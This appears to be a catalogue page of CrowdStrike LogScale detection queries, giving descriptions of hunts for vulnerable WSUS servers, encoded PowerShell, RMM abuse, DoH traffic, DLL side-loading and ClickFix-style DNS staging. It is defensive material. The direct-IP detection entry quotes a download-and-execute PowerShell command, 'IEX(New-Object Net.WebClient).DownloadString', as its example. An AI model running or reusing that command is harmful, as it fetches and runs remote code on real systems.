EXPLORE DETECTIONS

CVE-2025-59287 vulnerable WSUS servers identification

This query identifies WSUS servers that have the wsusservice enabled and that are vulnerable to CVE-2025-59287 This CQL query helps to identify WSUS servers that are vulnerable to CVE-2025-59287 Reference: https://www.reddit.com/r/crowdstrike/comments/1ohdzpm/comment/nlp7men/

Decode SignInfoFlags

The query decodes SignInfoFlags from Windows process events to identify signature details and highlight unsigned or improperly signed executables. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Decode%20SignInfoFlags.md)

Decode VolumeDeviceCharacteristics Bitmask

The query decodes the VolumeDeviceCharacteristics bitfield to reveal device properties such as removable media, network drives, virtual volumes, or portable devices. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Decode%20VolumeDeviceCharacteristics%20Bitmask.md)

Deleted Local User Accounts

Table of all deleted local user accounts including UserName, ComputerName, aid, aip, and LocalIP.

Detect and Decode Base64-Encoded PowerShell Commands

The query identifies Windows PowerShell executions using encoded commands, extracts and decodes Base64 payloads (including nested encodings), counts occurrences and unique hosts, and outputs decoded command content for analysis of potentially obfuscated activity. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Decode%20Base64.md)

Detect and Decode Base64-Encoded PowerShell Commands - http

The query identifies Windows PowerShell executions using encoded commands, extracts and decodes Base64 payloads (including nested encodings), counts occurrences and unique hosts, and outputs decoded command content for analysis of potentially obfuscated activity. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Decode%20Base64.md)

Detect Critical Environment Variable Changes over SSH with Connection Details

The query identifies critical changes to critical environment variables, extracts connection details such as user, local and remote IPs and ports, and provides a direct link to the related process in Falcon Process Explorer. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Critical%20Environment%20Variable%20Changed%20SSH.md)

Detect Data Exfiltration via external storage devices

This query shows unusual activity involving external storage devices, such as large file copy operations, bulk transfers to physical external media. While USB devices are common for legitimate use, adversaries may exploit them to exfiltrate confidential data outside normal monitoring channels. Such activity is especially concerning in restricted environments, as it bypasses network-based detection controls and can indicate insider threat or physical compromise.

Detect locally disabled RTR

This query identifies hosts with locally disabled RTR.

Detect NTLMv1 Authentications

This query detects NTLM v1 authentications using Falcon ITP telemetry. [Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation](https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables?linkId=38338466&hl=en)

Detect NTLMv1 Authentications (Windows Event Logs)

This query detects NTLM v1 authentications using Windows Event Log telemetry. [Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation](https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables?linkId=38338466&hl=en)

Detect Remote Monitoring and Management (RMM) Tools over DNS

This query identifies the presence or execution of common RMM utilities (e.g., AnyDesk, TeamViewer, ConnectWise, ScreenConnect, Splashtop). While these tools are legitimate and widely used for IT administration, adversaries often abuse them as “living-off-the-land” remote access backdoors. Because they operate under the guise of trusted software and can blend with normal activity, malicious use of RMM tools may bypass traditional security controls, enabling persistence, data exfiltration, or hands-on-keyboard attacks.

Detect RTR High Risk Commands

Detects the execution of high risk commands such as - get - put - memdump - xmemdump - run - put-and-run

Detect Suspicious Windows Command-Line Activity Using System Utilities

The query analyzes Windows ProcessRollup2 events to identify unusual use of common administrative tools (e.g., net.exe, sc.exe, nltest.exe, systeminfo.exe). It assigns behavior weights based on command-line patterns, aggregates activity per host and hour, flags systems with high or frequent activity, and provides direct links for host investigation in Falcon. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Custom%20Weighting%20Command%20Line%20and%20File%20Name.md)

Detection of DNS Requests to AI-Related Domains

This query identifies DNS requests to domains listed in the AI-Domains.csv lookup. It filters out browser-initiated traffic from Chrome and Edge. The result highlights which hosts and processes are generating the most DNS requests to those domains. The query relies on an lookup file with at least one column named Domain. The lookup provides the set of AI-related domains to check against. Without this file, the match() operator cannot resolve which DNS requests should be considered relevant. **Example** |Domain |--- |chat.openai.com |chatgpt.com |openai.com |claude.ai |anthropic.com |bard.google.com |*.ai |*.openai.com

Detection of DoH traffic to known DoH-providers

This query identifies network traffic to well-known DoH endpoints (e.g., Cloudflare, Google, Quad9, Mozilla). DoH encrypts DNS requests inside HTTPS, which enhances privacy but creates blind spots for defenders. Adversaries can exploit DoH to bypass DNS-based filtering, hide access to phishing domains, establish stealthy command-and-control channels, or exfiltrate data without triggering traditional DNS logs. Monitoring and alerting on DoH connections helps restore visibility into DNS activity—one of the most critical layers of network defense. DNS over HTTPS (DoH) encrypts DNS queries by tunneling them through HTTPS, making them indistinguishable from regular web traffic. While this improves user privacy, it also introduces blind spots for security teams. Why it matters: - Phishing domains can be accessed without triggering DNS-based filtering. - Command-and-Control (C2) communication can blend into normal HTTPS traffic. - Data exfiltration becomes harder to detect as destination domains are hidden. Impact on organizations: Without proper monitoring or controls, DoH can undermine DNS visibility—one of the most critical layers in network security—allowing threats to go unnoticed.

Detection of External Direct IP Usage in CommandLine Windows and Mac

Detection of External Direct IP Usage This query detects Windows processes that utilize raw public IP addresses within HTTP/HTTPS URLs in their command-line arguments (e.g., powershell -c IEX(New-Object Net.WebClient).DownloadString('http://1.2.3.4/payload')). This behavior is highly suspicious because legitimate software typically uses domain names (DNS). Attackers often use direct public IPs to host second-stage payloads or C2 servers to bypass DNS filtering and logging mechanisms. Query Description: Detection of External Direct IP Usage This query detects Windows processes that utilize raw public IP addresses within HTTP/HTTPS URLs in their command-line arguments (e.g., powershell -c IEX(New-Object Net.WebClient).DownloadString('http://1.2.3.4/payload')). This behavior is highly suspicious because legitimate software typically uses domain names (DNS). Attackers often use direct public IPs to host second-stage payloads or C2 servers to bypass DNS filtering and logging mechanisms. Key Logic Breakdown Scope & Filter: Targets Windows process creation events (ProcessRollup2). Filters for command lines containing http. Exclusions: Removes known noisy applications (e.g., Chrome, HP Click, Umbrella) to reduce false positives. Extraction (Regex): It scans the command line to extract a URL specifically formatted with an IPv4 address (e.g., http://x.x.x.x/...). It isolates the IP address from that URL into a field called Ipaddress. Public IP Validation: It uses !cidr(...) to exclude all standard private and reserved IP ranges (Localhost, 10.x, 192.168.x, 172.16.x, APIPA, etc.). This ensures the query only alerts on Public/External IPs. Formatting & Triage: It generates a clickable ExecutionSummary that includes the Parent Process, the Target Image, and the specific Command Line. It generates direct links (ProcessExplorer, GraphExplorer) to the Falcon console for immediate investigation. Aggregation: The results are grouped by ComputerName, showing how many times the event occurred and the first/last time it was seen.

Detection of Generic User Account Usage

This query identifies the use of generic or shared user accounts by leveraging a predefined lookup file containing known default and non-personalized usernames (e.g., admin, test, root). | Framework | Primary Reason | Specific Source / Control | |---------------|----------------------------------|-------------------------------------| | PCI DSS | Individual Accountability | Requirement 8.2.1 | | HIPAA | Traceability of PHI Access | 45 CFR § 164.312(a)(2)(i) | | ISO 27001 | Privileged Access Control | Annex A 5.15 / 8.2 | | NIST 800-53 | Risk Management | AC-2(9) | | SOC 2 | Auditability | CC6.1 |

Devices in RFM state

Dll-Side Loading Detection Query

The query traces processes that write both DLL and EXE files to the same location while exhibiting masquerading behavior. Reference: [GitHub Aamir-Muhammad/CrowdStrike-Queries](https://github.com/Aamir-Muhammad/CrowdStrike-Queries/blob/main/Hunting-Queries/DLL-Side-Loading-Detection.md)

DNS Resolutions from Browser Processes

This query correlates web browser process executions with their DNS queries to identify which domains were resolved by browser processes on specific endpoints

DNS Staging Detection: ClickFix-Inspired nslookup Execution

Detects nslookup activity used for DNS-based staging, specifically targeting the pattern of querying external nameservers to retrieve and execute malicious payloads, as seen in recent ClickFix attacks. This hunt is highly valuable as it identifies a shift away from heavily-monitored tools like mshta and PowerShell toward abusing trusted network utilities to bypass standard firewalls and blend with legitimate DNS traffic. Targeting trusted binaries: Monitors nslookup.exe, which attackers now prefer because it is less likely to be blocked by security software than mshta or PowerShell. External DNS Queries: Specifically looks for nslookup commands that provide a direct IP address for an external nameserver, bypassing the system's default, monitored DNS resolver. Staging Pattern: Detects the use of findstr on the nslookup output, a known ClickFix technique to parse the "Name:" field from a DNS response and treat it as a secondary command for execution. Execution Chain: Monitors for the piping of this output directly into execution engines like PowerShell or IEX. Evasion Detection: DNS traffic is frequently allowed through corporate firewalls, making this a "lightweight staging channel" that effectively hides data exfiltration and payload delivery in plain sight. To test your query, run nslookup -q=txt google.com 1.1.1.1 in a command prompt. This triggers your detection by requesting a TXT record while bypassing local DNS to use an external IP. Wait a few minutes for the telemetry to ingest, then run your search to confirm the activity appears in your results.

Domain Controllers with high load

Domain controllers with either average CPU usage, average RAM usage that exceeds 80% or Available Disk space < 10GB. This indicates low capacity or unexpected excessive usage.

Enriched Process Tree Association Events

The query filters for AssociateTreeIdWithRoot events, joins them with detection-pattern metadata from a CSV file, and outputs key fields like timestamp, host, pattern details and severity for analysis. In short, it enriches process-tree association events with contextual detection information. ## [AssociateTreeIdWithRoot](https://docs.crowdstrike.com/r/associatetreeidwithroot) This event is generated when there is a detection in the sensor. This event has a data field called PatternId that contains a pattern ID. Pattern IDs correspond to a detection. Reference[GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/AssociateTreeIdWithRoot%20to%20Pattern%20Details.md)